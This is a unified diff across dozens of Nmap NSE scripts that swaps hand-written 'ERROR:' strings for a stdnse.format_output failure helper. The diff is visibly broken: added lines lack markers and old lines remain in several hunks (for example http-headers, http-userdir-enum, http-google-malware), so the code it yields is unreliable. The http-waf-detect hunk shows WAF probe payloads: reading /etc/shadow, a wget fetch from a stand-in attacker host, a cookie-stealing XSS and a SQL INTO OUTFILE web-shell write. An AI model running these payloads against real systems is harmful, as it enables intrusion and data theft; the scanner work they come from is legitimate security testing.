+++ b/scripts/http-cisco-anyconnect.nse
@@ -42,7 +42,7 @@ action = function(host, port)
  local ac = anyconnect.Cisco.AnyConnect:new(host, port)
  local status, err = ac:connect()
  if not status then
-    return ("\n  ERROR: %s"):format(err)
+    return stdnse.format_output(false, err)
  else
    local o = stdnse.output_table()
    local xmltags = { 'version', 'tunnel-group', 'group-alias',
--- a/scripts/http-comments-displayer.nse
+++ b/scripts/http-comments-displayer.nse
@@ -108,7 +108,7 @@ action = function(host, port)
      -- most of them are "legitimate" and should not be reason to abort
      if (not(status)) then
        if (r.err) then
-          return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+          return stdnse.format_output(false, r.reason)
        else
          break
        end
--- a/scripts/http-csrf.nse
+++ b/scripts/http-csrf.nse
@@ -115,7 +115,7 @@ action = function(host, port)
      -- most of them are "legitimate" and should not be reason to abort
      if (not(status)) then
        if (r.err) then
-          return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+          return stdnse.format_output(false, r.reason)
        else
          break
        end
--- a/scripts/http-default-accounts.nse
+++ b/scripts/http-default-accounts.nse
@@ -258,7 +258,8 @@ action = function(host, port)
  -- Nuclear launch detected!
  results = http.pipeline_go(host, port, requests, nil)
  if results == nil then
-    return "[ERROR] HTTP request table is empty. This should not happen since we at least made one request."
+    return stdnse.format_output(false,
      "HTTP request table is empty. This should not happen since we at least made one request.")
  end
  -- Record 404 response, later it will be used to determine if page exists
--- a/scripts/http-devframework.nse
+++ b/scripts/http-devframework.nse
@@ -117,7 +117,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if (not(status)) then
      if (r.err) then
-        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-dombased-xss.nse
+++ b/scripts/http-dombased-xss.nse
@@ -96,7 +96,7 @@ action = function(host, port)
      -- most of them are "legitimate" and should not be reason to abort
      if (not(status)) then
        if (r.err) then
-          return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+          return stdnse.format_output(false, r.reason)
        else
          break
        end
--- a/scripts/http-domino-enum-passwords.nse
+++ b/scripts/http-domino-enum-passwords.nse
@@ -207,6 +207,7 @@ local function saveIDFile( filename, data )
  return true
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
@@ -226,7 +227,7 @@ action = function(host, port)
   -- A user was provided, attempt to authenticate
    if ( user ) then
      if (not(isValidCredential( vhost or host, port, path, user, pass )) ) then
-        return "  \n  ERROR: The provided credentials where invalid"
+        return fail("The provided credentials were invalid")
      end
    else
      local c = creds.Credentials:new(creds.ALL_DATA, host, port)
@@ -240,7 +241,7 @@ action = function(host, port)
      end
      if not pass then
        local msg = has_creds and "No valid credentials were found" or "No credentials supplied"
-        return string.format("  \n  ERROR: %s (see domino-enum-passwords.username and domino-enum-passwords.password)", msg)
+        return fail(("%s (see domino-enum-passwords.username and domino-enum-passwords.password)"):format(msg))
      end
    end
  end
@@ -253,9 +254,9 @@ action = function(host, port)
  if ( not(pager) ) then
    if ( http_response.body and
      http_response.body:match(".*<input type=\"submit\".* value=\"Sign In\">.*" ) ) then
-      return "  \n  ERROR: Failed to authenticate"
+      return fail("Failed to authenticate")
    else
-      return "  \n  ERROR: Failed to process results"
+      return fail("Failed to process results")
    end
  end
  pos = 1
--- a/scripts/http-errors.nse
+++ b/scripts/http-errors.nse
@@ -91,7 +91,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if (not(status)) then
      if (r.err) then
-        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-feed.nse
+++ b/scripts/http-feed.nse
@@ -106,7 +106,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if (not(status)) then
      if (r.err) then
-        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-fetch.nse
+++ b/scripts/http-fetch.nse
@@ -133,7 +133,7 @@ local function fetch_recursively(host, port, url, destination, patterns, output)
    local status, r = crawler:crawl()
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, "ERROR: %s", r.reason)
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-fileupload-exploiter.nse
+++ b/scripts/http-fileupload-exploiter.nse
@@ -237,7 +237,7 @@ action = function(host, port)
      -- most of them are "legitimate" and should not be reason to abort
      if ( not(status) ) then
        if ( r.err ) then
-          return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+          return stdnse.format_output(false, r.reason)
        else
          break
        end
--- a/scripts/http-google-malware.nse
+++ b/scripts/http-google-malware.nse
@@ -53,6 +53,8 @@ local function build_qry(apikey, url)
  return string.format("https://sb-ssl.google.com/safebrowsing/api/lookup?client=%s&apikey=%s&appver=1.5.2&pver=3.0&url=%s", SCRIPT_NAME, apikey, url)
 end
 local function fail (err) return stdnse.format_output(false, err) end
 ---
 --MAIN
 ---
@@ -72,8 +74,7 @@ action = function(host, port)
  local target_url = stdnse.get_script_args("http-google-malware.url") or string.format("%s://%s", port.service, target)
  if string.len(apikey) < 25 then
-    return string.format("[ERROR] No API key found. Update the variable APIKEY in %s or set it in the argument %s.api",
+    return fail(("No API key found. Use the %s.api argument"):format(SCRIPT_NAME))
                         SCRIPT_NAME, SCRIPT_NAME)
  end
  stdnse.debug1("Checking host %s", target_url)
@@ -82,7 +83,7 @@ action = function(host, port)
  stdnse.debug2("%s", qry)
  if ( req.status > 400 ) then
-    return "[ERROR] Request failed (invalid API key?)"
+    return fail("Request failed (invalid API key?)")
  end
  --The Safe Lookup API responds with a type when site is on the lists
--- a/scripts/http-grep.nse
+++ b/scripts/http-grep.nse
@@ -259,7 +259,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, "ERROR: %s", r.reason)
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-headers.nse
+++ b/scripts/http-headers.nse
@@ -33,6 +33,8 @@ categories = {"discovery", "safe"}
 portrule = shortport.http
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
  local useget = stdnse.get_script_args(SCRIPT_NAME..".useget")
@@ -54,19 +56,11 @@ action = function(host, port)
  end
  if(result == nil) then
-    if(nmap.debugging() > 0) then
+    return fail("Header request failed")
      return "ERROR: Header request failed"
    else
      return nil
    end
  end
  if(result.rawheader == nil) then
-    if(nmap.debugging() > 0) then
+    return fail("Header request didn't return a proper header")
      return "ERROR: Header request didn't return a proper header"
    else
      return nil
    end
  end
  table.insert(result.rawheader, "(Request type: " .. request_type .. ")")
--- a/scripts/http-icloud-findmyiphone.nse
+++ b/scripts/http-icloud-findmyiphone.nse
@@ -45,7 +45,7 @@ local function decodeString(str)
  return str:gsub("\226\128\153", "'")
 end
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function()
--- a/scripts/http-icloud-sendmsg.nse
+++ b/scripts/http-icloud-sendmsg.nse
@@ -58,7 +58,7 @@ local function decodeString(str)
  return str:gsub("\226\128\153", "'")
 end
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 local function listDevices(mm)
  local status, devices = mm:getDevices()
--- a/scripts/http-iis-webdav-vuln.nse
+++ b/scripts/http-iis-webdav-vuln.nse
@@ -151,6 +151,8 @@ local function go(host, port)
  return true, results, is_vulnerable
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  -- Start by checking if '/' is protected -- if it is, we can't do the tests
  local result = go_single(host, port, "/")
@@ -179,7 +181,7 @@ action = function(host, port)
      else
        stdnse.debug1("PROPFIND request failed.")
      end
-      return nmap.verbosity() > 0 and "ERROR: This web server is not supported." or nil
+      return fail("This web server is not supported.")
    end
  end
@@ -200,7 +202,7 @@ action = function(host, port)
    local status, results, is_vulnerable = go(host, port)
    if(status == false) then
-      return nmap.verbosity() > 0 and "ERROR: " .. results or nil
+      return fail(results)
    else
      if(#results == 0) then
        if(is_vulnerable == false) then
--- a/scripts/http-method-tamper.nse
+++ b/scripts/http-method-tamper.nse
@@ -128,7 +128,7 @@ vulnerabilities via HTTP verb tampering. This is often found in web servers that
      local status, r = crawler:crawl()
      if ( not(status) ) then
        if ( r.err ) then
-          return stdnse.format_output(true, "ERROR: %s", r.reason)
+          return stdnse.format_output(false, r.reason)
        else
          break
        end
--- a/scripts/http-open-redirect.nse
+++ b/scripts/http-open-redirect.nse
@@ -97,7 +97,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, "ERROR: %s", r.reason)
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-phpself-xss.nse
+++ b/scripts/http-phpself-xss.nse
@@ -133,7 +133,7 @@ PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Refl
    local status, r = crawler:crawl()
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, "ERROR: %s", r.reason)
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-proxy-brute.nse
+++ b/scripts/http-proxy-brute.nse
@@ -103,7 +103,7 @@ action = function(host, port)
  local status, err = checkProxy(host, port, arg_url)
  if ( not(status) ) then
-    return ("\n  ERROR: %s"):format(err)
+    return stdnse.format_output(false, err)
  end
  local engine = brute.Engine:new(Driver, host, port)
--- a/scripts/http-referer-checker.nse
+++ b/scripts/http-referer-checker.nse
@@ -61,7 +61,7 @@ action = function(host, port)
    local status, r = crawler:crawl()
    if (not(status)) then
      if (r.err) then
-        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-rfi-spider.nse
+++ b/scripts/http-rfi-spider.nse
@@ -171,7 +171,7 @@ function action(host, port)
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-sitemap-generator.nse
+++ b/scripts/http-sitemap-generator.nse
@@ -137,7 +137,7 @@ function action(host, port)
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-sql-injection.nse
+++ b/scripts/http-sql-injection.nse
@@ -235,7 +235,7 @@ action = function(host, port)
    local status, r = crawler:crawl()
    if (not(status)) then
      if (r.err) then
-        return stdnse.format_output(true, "ERROR: %s", r.reason)
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-stored-xss.nse
+++ b/scripts/http-stored-xss.nse
@@ -183,7 +183,7 @@ action = function(host, port)
      -- most of them are "legitimate" and should not be reason to abort
      if ( not(status) ) then
        if ( r.err ) then
-          return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+          return stdnse.format_output(false, r.reason)
        else
          break
        end
@@ -247,7 +247,7 @@ action = function(host, port)
      -- most of them are "legitimate" and should not be reason to abort
      if ( not(status) ) then
        if ( r.err ) then
-          return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+          return stdnse.format_output(false, r.reason)
        else
          break
        end
--- a/scripts/http-unsafe-output-escaping.nse
+++ b/scripts/http-unsafe-output-escaping.nse
@@ -131,7 +131,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, "ERROR: %s", r.reason)
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-userdir-enum.nse
+++ b/scripts/http-userdir-enum.nse
@@ -41,7 +41,7 @@ categories = {"auth", "intrusive"}
 portrule = shortport.http
-
+local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
@@ -52,21 +52,13 @@ action = function(host, port)
  -- speedy exit if no usernames
  if(#usernames == 0) then
-    if(nmap.debugging() > 0) then
+    return fail("Didn't find any users to test (should be in nselib/data/usernames.lst)")
      return "Didn't find any users to test (should be in nselib/data/usernames.lst)"
    else
      return nil
    end
  end
  -- Check what response we get for a 404
  local result, result_404, known_404 = http.identify_404(host, port)
  if(result == false) then
-    if(nmap.debugging() > 0) then
+    return fail(result_404)
      return "ERROR: " .. result_404
    else
      return nil
    end
  end
  -- Check if we can use HEAD requests
@@ -93,11 +85,7 @@ action = function(host, port)
  -- Check for http.pipeline error
  if(results == nil) then
    stdnse.debug1("http.pipeline returned nil")
-    if(nmap.debugging() > 0) then
+    return fail("http.pipeline returned nil")
      return "ERROR: http.pipeline returned nil"
    else
      return nil
    end
  end
  local found = {}
--- a/scripts/http-virustotal.nse
+++ b/scripts/http-virustotal.nse
@@ -208,7 +208,7 @@ local function parseScanReport(report)
  return result
 end
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function()
--- a/scripts/http-vlcstreamer-ls.nse
+++ b/scripts/http-vlcstreamer-ls.nse
@@ -54,7 +54,7 @@ portrule = shortport.port_or_service(54340, "vlcstreamer", "tcp")
 local arg_dir = stdnse.get_script_args(SCRIPT_NAME .. ".dir") or "/"
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
--- a/scripts/http-vuln-cve2011-3368.nse
+++ b/scripts/http-vuln-cve2011-3368.nse
@@ -85,7 +85,7 @@ servers to remote users who send carefully crafted requests.]],
  local bypass_request = http.pipeline_go(host,port, all)
  if ( not(bypass_request) ) then
    stdnse.debug1("got no answers from pipelined queries")
-    return "\n  ERROR: Got no answers from pipelined queries"
+    return stdnse.format_output(false, "Got no answers from pipelined queries")
  end
--- a/scripts/http-vuln-cve2014-2126.nse
+++ b/scripts/http-vuln-cve2014-2126.nse
@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
 local shortport = require('shortport')
 local vulns = require('vulns')
 local sslcert = require('sslcert')
 local stdnse = require "stdnse"
 description = [[
 Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM
@@ -70,7 +71,7 @@ Cisco Adaptive Security Appliance (ASA) Software 8.2 before 8.2(5.47), 8.4 befor
  local ac = anyconnect.Cisco.AnyConnect:new(host, port)
  local status, err = ac:connect()
  if not status then
-    return ("\n  ERROR: %s"):format(err)
+    return stdnse.format_output(false, err)
  else
    local ver = ac:get_version()
    if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then
--- a/scripts/http-vuln-cve2014-2127.nse
+++ b/scripts/http-vuln-cve2014-2127.nse
@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
 local shortport = require('shortport')
 local vulns = require('vulns')
 local sslcert = require('sslcert')
 local stdnse = require "stdnse"
 description = [[
 Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN
@@ -70,7 +71,7 @@ Cisco Adaptive Security Appliance (ASA) Software 8.x before 8.2(5.48), 8.3 befor
  local ac = anyconnect.Cisco.AnyConnect:new(host, port)
  local status, err = ac:connect()
  if not status then
-    return ("\n  ERROR: %s"):format(err)
+    return stdnse.format_output(false, err)
  else
    local ver = ac:get_version()
    if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then
--- a/scripts/http-vuln-cve2014-2128.nse
+++ b/scripts/http-vuln-cve2014-2128.nse
@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
 local shortport = require('shortport')
 local vulns = require('vulns')
 local sslcert = require('sslcert')
 local stdnse = require "stdnse"
 description = [[
 Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN
@@ -71,7 +72,7 @@ The SSL VPN implementation in Cisco Adaptive Security Appliance (ASA) Software 8
  local ac = anyconnect.Cisco.AnyConnect:new(host, port)
  local status, err = ac:connect()
  if not status then
-    return ("\n  ERROR: %s"):format(err)
+    return stdnse.format_output(false, err)
  else
    local ver = ac:get_version()
    if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then
--- a/scripts/http-vuln-cve2014-2129.nse
+++ b/scripts/http-vuln-cve2014-2129.nse
@@ -2,6 +2,7 @@ local anyconnect = require('anyconnect')
 local shortport = require('shortport')
 local vulns = require('vulns')
 local sslcert = require('sslcert')
 local stdnse = require "stdnse"
 description = [[
 Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP
@@ -68,7 +69,7 @@ The SIP inspection engine in Cisco Adaptive Security Appliance (ASA) Software 8.
  local ac = anyconnect.Cisco.AnyConnect:new(host, port)
  local status, err = ac:connect()
  if not status then
-    return ("\n  ERROR: %s"):format(err)
+    return stdnse.format_output(false, err)
  else
    local ver = ac:get_version()
    if vuln_versions[ver['major']] and vuln_versions[ver['major']][ver['minor']] then
--- a/scripts/http-waf-detect.nse
+++ b/scripts/http-waf-detect.nse
@@ -66,6 +66,8 @@ local attack_vectors_n2 = {"?p4yl04d=cat%20/etc/shadow", "?p4yl04d=id;uname%20-a
                          "?p4yl04d=<img%20src='x'%20onerror=alert(document.cookie)%20/>", "?p4yl04d=wget%20http://ev1l.com/xpl01t.txt",
                          "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php'--"}
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local orig_req, tests
  local path = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
@@ -79,7 +81,7 @@ action = function(host, port)
  if orig_req.status and orig_req.body then
    stdnse.debug3("Normal HTTP response -> Status:%d Body:\n%s", orig_req.status, orig_req.body)
  else
-    return "[ERROR] Initial HTTP request failed"
+    return fail("Initial HTTP request failed")
  end
  --if aggro mode on, try all vectors
  if aggro then
@@ -97,7 +99,7 @@ action = function(host, port)
  local test_results = http.pipeline_go(host, port, tests)
  if test_results == nil then
-    return "[ERROR] HTTP request table is empty. This should not ever happen because we at least made one request."
+    return fail("HTTP request table is empty. This should not ever happen because we at least made one request.")
  end
--- a/scripts/icap-info.nse
+++ b/scripts/icap-info.nse
@@ -40,7 +40,7 @@ categories = {"safe", "discovery"}
 portrule = shortport.port_or_service(1344, "icap")
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 local function parseResponse(resp)
  if ( not(resp) ) then
--- a/scripts/imap-brute.nse
+++ b/scripts/imap-brute.nse
@@ -99,6 +99,7 @@ Driver =
 }
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
@@ -106,9 +107,9 @@ action = function(host, port)
  -- authentication mechanisms can be determined
  local helper = imap.Helper:new(host, port)
  local status = helper:connect()
-  if (not(status)) then return "\n  ERROR: Failed to connect to the server." end
+  if (not(status)) then return fail("Failed to connect to the server.") end
  local status, capabilities = helper:capabilities()
-  if (not(status)) then return "\n  ERROR: Failed to retrieve capabilities." end
+  if (not(status)) then return fail("Failed to retrieve capabilities.") end
  -- check if an authentication mechanism was provided or try
  -- try them in the mech_prio order
@@ -129,7 +130,7 @@ action = function(host, port)
  -- if no mechanisms were found, abort
  if ( not(mech) ) then
-    return "\n  ERROR: No suitable authentication mechanism was found"
+    return fail("No suitable authentication mechanism was found")
  end
  local engine = brute.Engine:new(Driver, host, port)
--- a/scripts/imap-capabilities.nse
+++ b/scripts/imap-capabilities.nse
@@ -25,13 +25,15 @@ categories = {"default", "safe"}
 portrule = shortport.port_or_service({143, 993}, {"imap", "imaps"})
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local helper = imap.Helper:new(host, port)
  local status = helper:connect()
-  if ( not(status) ) then return "\n  ERROR: Failed to connect to server" end
+  if ( not(status) ) then return fail("Failed to connect to server") end
  local status, capa = helper:capabilities(host, port)
-  if( not(status) ) then return "\n  ERROR: Failed to retrieve capabilities" end
+  if( not(status) ) then return fail("Failed to retrieve capabilities") end
  helper:close()
  if type(capa) == "table" then
--- a/scripts/informix-query.nse
+++ b/scripts/informix-query.nse
@@ -67,7 +67,7 @@ action = function( host, port )
      user = nmap.registry['informix-brute'][1]["username"]
      pass = nmap.registry['informix-brute'][1]["password"]
    else
-      return "  \n  ERROR: No credentials specified (see informix-table.username and informix-table.password)"
+      return stdnse.format_output(false, "No credentials specified (see informix-table.username and informix-table.password)")
    end
  end
--- a/scripts/informix-tables.nse
+++ b/scripts/informix-tables.nse
@@ -57,6 +57,8 @@ dependencies = { "informix-brute" }
 portrule = shortport.port_or_service( { 1526, 9088, 9090, 9092 }, "informix", "tcp", "open")
 local function fail (err) return stdnse.format_output(false, err) end
 action = function( host, port )
  local helper
  local status, data
@@ -77,7 +79,7 @@ action = function( host, port )
      user = nmap.registry['informix-brute'][1]["username"]
      pass = nmap.registry['informix-brute'][1]["password"]
    else
-      return "  \n  ERROR: No credentials specified (see informix-table.username and informix-table.password)"
+      return fail("No credentials specified (see informix-table.username and informix-table.password)")
    end
  end
@@ -94,7 +96,7 @@ action = function( host, port )
  local databases
  status, databases = helper:GetDatabases()
  if ( not(status) ) then
-    return "  \n  ERROR: Failed to retrieve a list of databases"
+    return fail("Failed to retrieve a list of databases")
  end
  for _, db in ipairs(databases) do
--- a/scripts/ip-forwarding.nse
+++ b/scripts/ip-forwarding.nse
@@ -72,7 +72,7 @@ icmpEchoRequest = function(ifname, host, addr)
  return status
 end
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host)
@@ -93,7 +93,7 @@ action = function(host)
  end
  if ( target == host.ip ) then
-    return ("\n  ERROR: Target can not be the same as the scanned host")
+    return fail("Target can not be the same as the scanned host")
  end
  if (icmpEchoRequest(ifname, host, target)) then
--- a/scripts/iscsi-brute.nse
+++ b/scripts/iscsi-brute.nse
@@ -66,7 +66,7 @@ action = function( host, port )
  local target = stdnse.get_script_args('iscsi-brute.target')
  if ( not(target) ) then
-    return "ERROR: No target specified (see iscsi-brute.target)"
+    return stdnse.format_output(false, "No target specified (see iscsi-brute.target)")
  end
  local helper = iscsi.Helper:new( host, port )
--- a/scripts/isns-info.nse
+++ b/scripts/isns-info.nse
@@ -34,7 +34,7 @@ author = "Patrik Karlsson"
 license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
 categories = {"safe", "discovery"}
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local helper = isns.Helper:new(host, port)
--- a/scripts/krb5-enum-users.nse
+++ b/scripts/krb5-enum-users.nse
@@ -360,6 +360,8 @@ local function checkUserThread( host, port, realm, user, result )
  condvar "signal"
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function( host, port )
  local realm = stdnse.get_script_args("krb5-enum-users.realm")
@@ -368,17 +370,17 @@ action = function( host, port )
  -- did the user supply a realm
  if ( not(realm) ) then
-    return "ERROR: No Kerberos REALM was supplied, aborting ..."
+    return fail("No Kerberos REALM was supplied, aborting ...")
  end
  -- does the realm appear to exist
  if ( not(isValidRealm(host, port, realm)) ) then
-    return "ERROR: Invalid Kerberos REALM, aborting ..."
+    return fail("Invalid Kerberos REALM, aborting ...")
  end
  -- load our user database from unpwdb
  local status, usernames = unpwdb.usernames()
-  if( not(status) ) then return "ERROR: Failed to load unpwdb usernames" end
+  if( not(status) ) then return fail("Failed to load unpwdb usernames") end
  -- start as many threads as there are names in the list
  local threads = {}
--- a/scripts/ldap-novell-getpass.nse
+++ b/scripts/ldap-novell-getpass.nse
@@ -52,6 +52,8 @@ categories = {"discovery", "safe"}
 portrule = shortport.port_or_service({389,636}, {"ldap","ldapssl"})
 local function fail (err) return stdnse.format_output(false, err) end
 function action(host,port)
  local username = stdnse.get_script_args("ldap-novell-getpass.username")
@@ -59,15 +61,14 @@ function action(host,port)
  local account = stdnse.get_script_args("ldap-novell-getpass.account")
  if ( not(username) ) then
-    return "\n  ERROR: No username was supplied (ldap-novell-getpass.username)"
+    return fail("No username was supplied (ldap-novell-getpass.username)")
  end
  if ( not(account) ) then
-    return "\n  ERROR: No account was supplied (ldap-novell-getpass.account)"
+    return fail("No account was supplied (ldap-novell-getpass.account)")
  else
    -- do some basic account validation
    if ( not(account:match("^[Cc][Nn]=.*,") ) ) then
-      return "\n  ERROR: The account argument should be specified as:\n" ..
+      return fail("The account argument should be specified as: \"CN=name,OU=orgunit,O=org\"")
        "    \"CN=name,OU=orgunit,O=org\""
    end
  end
@@ -76,7 +77,7 @@ function action(host,port)
  local anon_bind = bin.pack("H", "300c020101600702010304008000" )
  local socket, _, opt = comm.tryssl( host, port, anon_bind, nil )
  if ( not(socket) ) then
-    return "\n  ERROR: Failed to connect to LDAP server"
+    return fail("Failed to connect to LDAP server")
  end
  local status, errmsg = ldap.bindRequest( socket, {
@@ -106,7 +107,7 @@ function action(host,port)
  data = ldap.encode( { _ldaptype = '30', bin.pack("H", "020102") .. data } )
  status = socket:send(data)
-  if ( not(status) ) then return "ERROR: Failed to send request" end
+  if ( not(status) ) then return fail("Failed to send request") end
  status, data = socket:receive()
  if ( not(status) ) then return data end
@@ -120,7 +121,7 @@ function action(host,port)
  if ( rescode ~= 0 ) then
    local errmsg = ( #response >= 4 ) and response[4] or "An unknown error occurred"
-    return "\n  ERROR: " .. errmsg
+    return fail(errmsg)
  end
  -- make sure we get a NMAS Get Password Response back from the server
@@ -134,6 +135,6 @@ function action(host,port)
    table.insert(output, ("Password: %s"):format(universal_pw))
    return stdnse.format_output(true, output)
  else
-    return "\n  ERROR: No password was found"
+    return fail("No password was found")
  end
 end
--- a/scripts/ldap-search.nse
+++ b/scripts/ldap-search.nse
@@ -115,6 +115,7 @@ dependencies = {"ldap-brute"}
 portrule = shortport.port_or_service({389,636}, {"ldap","ldapssl"})
 local function fail (err) return stdnse.format_output(false, err) end
 function action(host,port)
  local status
@@ -189,7 +190,7 @@ function action(host,port)
    if not status then
      stdnse.debug1("ldap-search failed to bind: %s", errmsg)
-      return "  \n  ERROR: Authentication failed"
+      return fail("Authentication failed")
    end
  -- or if ldap-brute found us something
  elseif ( accounts ) then
@@ -219,7 +220,7 @@ function action(host,port)
  elseif qfilter == "custom" then
    if searchAttrib == nil or searchValue == nil then
-      return "\n\nERROR: Please specify both ldap.searchAttrib and ldap.searchValue using using the custom qfilter."
+      return fail("Please specify both ldap.searchAttrib and ldap.searchValue using using the custom qfilter.")
    end
    if string.find(searchValue, '*') == nil then
      filter = { op=ldap.FILTER.equalityMatch, obj=searchAttrib, val=searchValue }
@@ -230,7 +231,7 @@ function action(host,port)
  elseif qfilter == "all" or qfilter == nil then
    filter = nil -- { op=ldap.FILTER}
  else
-    return "  \n\nERROR: Unsupported Quick Filter: " .. qfilter
+    return fail("Unsupported Quick Filter: " .. qfilter)
  end
  if type(attribs) == 'string' then
@@ -252,7 +253,7 @@ function action(host,port)
    if not status then
      if ( searchResEntries:match("DSID[-]0C090627") and not(username) ) then
-        return "ERROR: Failed to bind as the anonymous user"
+        return fail("Failed to bind as the anonymous user")
      else
        stdnse.debug1("ldap.searchRequest returned: %s", searchResEntries)
        return
--- a/scripts/llmnr-resolve.nse
+++ b/scripts/llmnr-resolve.nse
@@ -184,7 +184,7 @@ action = function()
    interface = getInterface(mcast)
  end
  if not interface then
-    return ("\n ERROR: Couldn't get interface for %s"):format(mcast)
+    return stdnse.format_output(false, ("Couldn't get interface for %s"):format(mcast))
  end
  -- Launch listener thread
--- a/scripts/maxdb-info.nse
+++ b/scripts/maxdb-info.nse
@@ -126,6 +126,8 @@ local function parseDatabases(data)
  return tab.dump(result)
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  -- this could really be more elegant, but it has to do for now
  local handshake   = "5a000000035b000001000000ffffffff000004005a000000000242000409000000400000d03f00000040000070000000000500000004000000020000000300000749343231360004501c2a035201037201097064626d73727600"
@@ -139,17 +141,17 @@ action = function(host, port)
  status, data = exchPacket(socket, bin.pack("H", handshake))
  if ( not(status) ) then
-    return "\n  ERROR: Failed to perform handshake with MaxDB server"
+    return fail("Failed to perform handshake with MaxDB server")
  end
  status, data = exchPacket(socket, bin.pack("H", dbm_version))
  if ( not(status) ) then
-    return "\n  ERROR: Failed to request version information from server"
+    return fail("Failed to request version information from server")
  end
  local version_info = parseVersion(data)
  if ( not(version_info) ) then
-    return "\n  ERROR: Failed to parse version information from server"
+    return fail("Failed to parse version information from server")
  end
  local result, filter = {}, {"Version", "Build", "OS", "Instroot", "Sysname"}
@@ -160,7 +162,7 @@ action = function(host, port)
  status, data = exchCommand(socket, bin.pack("H", db_enum))
  socket:close()
  if ( not(status) ) then
-    return "\n  ERROR: Failed to request version information from server"
+    return fail("Failed to request version information from server")
  end
  local dbs = parseDatabases(data)
  table.insert(result, { name = "Databases", dbs } )
--- a/scripts/membase-brute.nse
+++ b/scripts/membase-brute.nse
@@ -68,7 +68,7 @@ Driver = {
 }
-local function fail(err) return ("\n  ERROR: %s"):format(err) end
+local function fail(err) return stdnse.format_output(false, err) end
 local function getMechs(host, port)
  local helper = membase.Helper:new(host, port)
--- a/scripts/membase-http-info.nse
+++ b/scripts/membase-http-info.nse
@@ -42,7 +42,7 @@ categories = {"discovery", "safe"}
 portrule = shortport.port_or_service(8091, "http", "tcp")
-local function fail(err) return ("\n  ERROR: %s"):format(err) end
+local function fail(err) return stdnse.format_output(false, err) end
 local filter = {
  ["parsed[1]['nodes'][1]['os']"] = { name = "OS" },
